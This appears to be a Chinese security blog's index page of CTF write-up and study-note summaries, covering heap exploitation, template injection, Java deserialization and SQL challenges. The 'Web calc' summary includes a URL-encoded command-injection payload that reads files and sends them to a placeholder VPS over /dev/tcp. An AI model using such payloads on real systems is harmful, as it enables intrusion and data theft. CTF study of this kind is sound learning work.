KingBridge

摘要： 跟着ctf-wiki学一下fastbin attack的原理，题目有时间再看看吧xD 环境搭建？ 由于在上古时期还没有tcache（这是在glibc2-26加入的），所以要换一个低版本libc进行实验。 用到的方法（注：新版本gdb不需要更改.debug） https://sillyrabbit.c 阅读全文

摘要： Y4tacker师傅在这篇文章中给出了Pebble最新模板注入的exp 2022UIUCTF-Spoink(Pebble最新模板注入) 其中，在用internalCachingMetadataReaderFactory加载类后，使用了jacksonObjectMapper调用受限制的无参构造器。 Y 阅读全文

摘要： 一个或几个c文件从源文件到可执行文件大致经历步骤如下 下面以具体例子说明一下各个阶段（本文用c++举例，事实上c/c++是一样的） 源文件 这是我用c++简单写的一个单链的实现（水平有限，算法爹轻喷ww)，部分参考单链表的基本操作C++ 一共有三个文件 head.h用于声明函数/变量/类。这里不得不 阅读全文

摘要： 两个月不写博客没被开真是个奇迹，本来这周打算比完赛之后睡大觉，但是看到nova凌晨直播Pwn属实是把我卷到了。。感觉是时候糊弄几篇博客了。但一直以来我web都是在乱学，不知道整点什么活，就看了看天枢协会的新生建议（发现完全适合我），找到了Portswigger Web Security Academ 阅读全文

摘要： 签到 签到 ez_pwn from pwn import * context(os='linux', arch='i386', log_level='debug') context.log_level='info' elf=ELF('./p') rop=ROP(elf) # p=process('. 阅读全文

摘要： Q=[] mod=int(input()) dig=int(input()) JK=[] def INPUT(): for i in range(mod): Qi=[] Qi_np1=[] for j in range(dig): k=int(input()) Qi.append(k) for j 阅读全文

摘要： Mini-L-CTF-2022 minispringboot Spring View Manipulation注入，也是基于Thymeleaf的ssti。当时get参数是个?name=xxx，强烈怀疑是注入点，但是没反应。结果路由也是可以注的 可参考 https://book.hacktricks. 阅读全文

摘要： Java反序列化学习--从URLDNS到CommonsCollections1-7 前言 前段时间陆续接触了一些java题，也了解了一些java反射的知识。但是一入java深似海，拿到一个题基本毫无头猪。昨天看了看nama大学霸在车联网安全赛上出的ezcc，预期解是把cc链和cb链给拼一拼。然而缺少 阅读全文

摘要： babysql 题目hint.md: CREATE TABLE `auth` ( `id` int NOT NULL AUTO_INCREMENT, `username` varchar(32) NOT NULL, `password` varchar(32) NOT NULL, PRIMARY K 阅读全文

摘要： Web calc 利用 os.system(log) ，反引号执行子命令 开头1#注释绕过eval，末尾<绕过重定向，制表符绕过空格，最后cat /*重定向到vps上 num=1%23%60cat%09/%2A%60%3E/dev/tcp/vpsip/2333%3C ezpop 换行绕最后的#,fl 阅读全文